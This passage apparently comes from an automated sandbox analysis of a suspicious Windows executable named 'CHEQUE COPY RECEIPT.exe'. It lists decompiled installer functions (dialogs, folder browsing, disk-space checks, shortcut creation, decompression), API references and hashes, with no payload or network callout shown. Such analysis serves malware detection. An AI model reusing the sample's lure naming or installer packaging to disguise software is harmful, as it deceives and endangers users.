				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f45c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}

0x004054b8
0x004054c0
0x004054c3
0x004054cb
0x004054ce
0x0040565d
0x00405663
0x00405687
0x00405687
0x00405693
0x00405699
0x004056bb
0x004056bb
0x004056c1
0x00405716
0x00405716
0x00405719
0x00000000
0x00000000
0x0040571b
0x0040571e
0x00405721
0x00000000
0x00000000
0x0040572b
0x00405731
0x00405733
0x00405736
0x00405833
0x00000000
0x00405833
0x00405745
0x00405751
0x0040575a
0x00405761
0x00405765
0x00405768
0x00405771
0x00405777
0x0040577a
0x0040577a
0x0040578a
0x00405790
0x00405793
0x0040579e
0x0040579e
0x0040579f
0x004057a2
0x004057a9
0x004057b0
0x004057b8
0x004057b8
0x004057c6
0x004057cc
0x004057cf
0x004057cf
0x004057d6
0x004057dc
0x004057e5
0x004057ec
0x004057f5
0x004057f7
0x004057fa
0x00405809
0x0040580b
0x0040580e
0x0040580f
0x00405812
0x00405813
0x00405814
0x00405814
0x0040581c
0x00405827
0x0040582d
0x0040582d
0x00000000
0x00405793
0x004056c3
0x004056c9
0x004056f7
0x004056f9
0x004056ff
0x0040570a
0x0040570a
0x00405711
0x00000000
0x00405711
0x004056cd
0x004056d7
0x00000000
0x0040569b
0x0040569b
0x004056a1
0x004056dc
0x00000000
0x004056e3
0x004056aa
0x004056b1
0x004056b6
0x00000000
0x004056b6
0x00405699
0x004054d4
0x004054d8
0x004054e0
0x004054e4
0x004054e7
0x004054ea
0x004054ed
0x004054f0
0x004054f1
0x004054f2
0x0040550b
0x0040550e
0x00405518
0x00405527
0x0040552f
0x00405537
0x0040553c
0x0040553f
0x0040554b
0x00405554
0x0040555d
0x0040557f
0x00405585
0x00405596
0x0040559b
0x004055a9
0x004055b7
0x004055b7
0x004055bc
0x004055ca
0x004055ca
0x004055cf
0x004055d2
0x004055d7
0x004055e3
0x004055ec
0x004055f9
0x00405608
0x004055fb
0x00405600
0x00405600
0x00405614
0x00405614
0x00405628
0x00405631
0x0040563a
0x0040564a
0x00405656
0x00405656
0x00000000

APIs

GetDlgItem.USER32 ref: 00405511
GetDlgItem.USER32 ref: 00405520
GetClientRect.USER32 ref: 0040555D
GetSystemMetrics.USER32 ref: 00405564
SendMessageA.USER32 ref: 00405585
SendMessageA.USER32 ref: 00405596
SendMessageA.USER32 ref: 004055A9
SendMessageA.USER32 ref: 004055B7
SendMessageA.USER32 ref: 004055CA
ShowWindow.USER32(00000000,?,0000001B,?), ref: 004055EC
ShowWindow.USER32(?,00000008), ref: 00405600
GetDlgItem.USER32 ref: 00405621
SendMessageA.USER32 ref: 00405631
SendMessageA.USER32 ref: 0040564A
SendMessageA.USER32 ref: 00405656
GetDlgItem.USER32 ref: 0040552F

Part of subcall function 00404306: SendMessageA.USER32 ref: 00404314

GetDlgItem.USER32 ref: 00405672
CreateThread.KERNEL32 ref: 00405680
CloseHandle.KERNEL32(00000000), ref: 00405687
ShowWindow.USER32(00000000), ref: 004056AA
ShowWindow.USER32(?,00000008), ref: 004056B1
ShowWindow.USER32(00000008), ref: 004056F7
SendMessageA.USER32 ref: 0040572B
CreatePopupMenu.USER32 ref: 0040573C
AppendMenuA.USER32 ref: 00405751
GetWindowRect.USER32 ref: 00405771
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
SendMessageA.USER32 ref: 004057C6
OpenClipboard.USER32(00000000), ref: 004057D6
EmptyClipboard.USER32 ref: 004057DC
GlobalAlloc.KERNEL32(00000042,?), ref: 004057E5
GlobalLock.KERNEL32 ref: 004057EF
SendMessageA.USER32 ref: 00405803
GlobalUnlock.KERNEL32(00000000), ref: 0040581C
SetClipboardData.USER32 ref: 00405827
CloseClipboard.USER32 ref: 0040582D

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
Instruction ID: 3d94e6139f86797c0ae92d92c46aaabaef2c33f238587a010477577dd15b8479
Opcode Fuzzy Hash: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
Instruction Fuzzy Hash: 1BA17C71900608BFDB11AFA1DE45EAE3B79FB08354F40443AFA45B61A0CB754E51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00404763, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404763(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42a090;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040594D(0x3fb, _t146);
					E00406528(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040594D(0x3fb, _t146);
							if(E00405CD3(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E0040624D(0x429888, _t146);
							_t87 = E00406656(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040624D(0x429888, _t146);
								_t89 = E00405C7E(0x429888);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429888,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429888) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429888,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C2C(0x429888);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429888) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404BF7(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ec1c; // 0x7a00a6
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404BDF(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429878);
									} else {
										E00404B1A(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f504 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E004042F3(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a8a8 == _t158) {
									E004046BC();
								}
								 *0x42a8a8 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a8b8;
							_v60 = E00404AB4;
							_v56 = _t146;
							_v68 = E004062E0(_t146, 0x42a8b8, _t166, 0x429c90, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BE5(_t146);
								_t125 =  *((intOrPtr*)( *0x42f454 + 0x11c));
								if( *((intOrPtr*)( *0x42f454 + 0x11c)) != 0 && _t146 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
									E004062E0(_t146, 0x42a8b8, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3e0, 0x42a8b8) != 0) {
										lstrcatA(_t146, 0x42e3e0);
									}
								}
								 *0x42a8a8 =  *0x42a8a8 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405C52(_t146) != 0 && E00405C7E(_t146) == 0) {
						E00405BE5(_t146);
					}
					 *0x42ec18 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042D1(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042D1(_t166);
					E00404306(_t165);
					_t138 = E00406656(8);
					if(_t138 == 0) {
						L53:
						return E00404338(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}

0x00404763
0x00404769
0x0040476f
0x0040477c
0x0040478a
0x0040478d
0x00404795
0x0040479b
0x0040479b
0x004047a7
0x004047aa
0x00404818
0x0040481f
0x004048f6
0x004048fd
0x0040490c
0x0040490c
0x00404910
0x0040491a
0x00404927
0x00404929
0x00404929
0x00404937
0x0040493e
0x00404945
0x00404948
0x0040497f
0x00404981
0x00404987
0x0040498c
0x00404990
0x00404992
0x00404992
0x004049ae
0x00000000
0x004049b0
0x004049b3
0x004049c1
0x004049c7
0x004049c8
0x004049cb
0x004049ce
0x00000000
0x004049ce
0x0040494a
0x0040494c
0x00404950
0x00000000
0x00000000
0x00000000
0x00000000
0x00404952
0x00404952
0x0040495f
0x00404964
0x00000000
0x00000000
0x00404968
0x0040496a
0x0040496a
0x00404972
0x00404974
0x00404977
0x0040497a
0x0040497d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040497d
0x004049da
0x004049e4
0x004049e7
0x004049ea
0x004049f1
0x004049f1
0x004049f3
0x004049f3
0x004049f8
0x004049fa
0x00404a02
0x00404a09
0x00404a0b
0x00404a16
0x00404a16
0x00404a0b
0x00404a1d
0x00404a26
0x00404a30
0x00404a38
0x00404a53
0x00404a3a
0x00404a43
0x00404a43
0x00404a38
0x00404a58
0x00404a5d
0x00404a62
0x00404a6b
0x00404a6b
0x00404a74
0x00404a76
0x00404a76
0x00404a82
0x00404a8a
0x00404a94
0x00404a94
0x00404a99
0x00000000
0x00404a99
0x00404948
0x004048ff
0x00404906
0x00000000
0x00000000
0x00000000
0x00404906
0x00404825
0x0040482e
0x00404848
0x0040484d
0x00404857
0x0040485e
0x0040486a
0x0040486d
0x00404870
0x00404877
0x0040487f
0x00404882
0x00404886
0x0040488d
0x00404895
0x004048ef
0x00404897
0x00404898
0x0040489f
0x004048a9
0x004048b1
0x004048be
0x004048d2
0x004048d6
0x004048d6
0x004048d2
0x004048db
0x004048e8
0x004048e8
0x00404895
0x00000000
0x0040484d
0x0040483b
0x00000000
0x00000000
0x00404841
0x00000000
0x004047ac
0x004047b9
0x004047c2
0x004047cf
0x004047cf
0x004047d6
0x004047dc
0x004047e5
0x004047e8
0x004047eb
0x004047f3
0x004047f6
0x004047f9
0x004047ff
0x00404806
0x0040480d
0x00404a9f
0x00404ab1
0x00404813
0x00404816
0x00000000
0x00404816
0x0040480d

APIs

GetDlgItem.USER32 ref: 004047B2
SetWindowTextA.USER32(00000000,?), ref: 004047DC
SHBrowseForFolderA.SHELL32(?,00429C90,?), ref: 0040488D
CoTaskMemFree.OLE32(00000000), ref: 00404898
lstrcmpiA.KERNEL32(Call,0042A8B8,00000000,?,?), ref: 004048CA
lstrcatA.KERNEL32(?,Call), ref: 004048D6
SetDlgItemTextA.USER32 ref: 004048E8

Part of subcall function 0040594D: GetDlgItemTextA.USER32 ref: 00405960

Part of subcall function 00406528: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
Part of subcall function 00406528: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
Part of subcall function 00406528: CharNextA.USER32(?,"C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
Part of subcall function 00406528: CharPrevA.USER32(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2

GetDiskFreeSpaceA.KERNEL32(00429888,?,?,0000040F,?,00429888,00429888,?,00000001,00429888,?,?,000003FB,?), ref: 004049A6
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049C1

Part of subcall function 00404B1A: lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
Part of subcall function 00404B1A: wsprintfA.USER32 ref: 00404BC0
Part of subcall function 00404B1A: SetDlgItemTextA.USER32 ref: 00404BD3

Strings

Call, xrefs: 004048C4, 004048C9, 004048D4
C:\Users\user\AppData\Local\Temp, xrefs: 004048B3
A, xrefs: 00404886

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp$Call
API String ID: 2624150263-2175137099
Opcode ID: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
Instruction ID: b89c9f0b9ad2a5e463b1d4baa2297f7fe0657747611b748bc5d4715ca5df860c
Opcode Fuzzy Hash: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
Instruction Fuzzy Hash: A9A17DB1A00209ABDB11AFA5C941AAF77B8EF84314F14843BF601B62D1DB7C99518F6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040216B(void* __eflags) {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405C52( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\alfons\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}

0x00402174
0x0040217e
0x00402188
0x00402195
0x004021a0
0x004021a3
0x004021bd
0x004021c3
0x004021c9
0x004021cc
0x004021d6
0x004021da
0x004021da
0x004021df
0x004021f0
0x004021f8
0x004022d4
0x004022d4
0x004022db
0x004021fe
0x004021fe
0x0040220d
0x00402211
0x00402214
0x0040221a
0x00402228
0x0040222b
0x0040222d
0x00402238
0x00402238
0x0040223d
0x0040223f
0x00402246
0x00402246
0x00402249
0x00402252
0x00402255
0x0040225a
0x0040225c
0x00402269
0x00402269
0x0040226c
0x00402278
0x0040227b
0x00402284
0x0040228a
0x00402291
0x004022aa
0x004022ac
0x004022ba
0x004022ba
0x004022aa
0x004022bd
0x004022c3
0x004022c3
0x004022c6
0x004022cc
0x004022d2
0x004022e7
0x00000000
0x00000000
0x00000000
0x004022d2
0x004022dd
0x00402a5d
0x00402a69

APIs

CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00402230

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-1943935188
Opcode ID: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
Instruction ID: b205fa0f6c371e5dc37930ac793058e6edb3c03a2887874d4a759486fbbeee3c
Opcode Fuzzy Hash: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
Instruction Fuzzy Hash: F5511671A00208AFCB50DFE4CA88E9D7BB6EF48314F2041BAF515EB2D1DA799981CB14

Uniqueness

Uniqueness Score: -1.00%

Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E004061AB(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E0040624D();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x004027b9
0x004027cd
0x004027d8
0x004027d9
0x00402918
0x004027bb
0x004027bb
0x004027bd
0x004027bf
0x004027bf
0x00402a5d
0x00402a69

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
Instruction ID: 52cf83cb61f6f27ed997ed7cc61b6938fc353794e3a771b70e6184720e28d6c0
Opcode Fuzzy Hash: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
Instruction Fuzzy Hash: B3F0A771604110DFD710EB649A49AEE77689F51314F6005BFF102F21C1D6B849469B3A

Uniqueness

Uniqueness Score: -1.00%

Function 00406A9B, Relevance: .3, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00406A9B(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E0040720A( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x408408; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x408408; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00407272( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
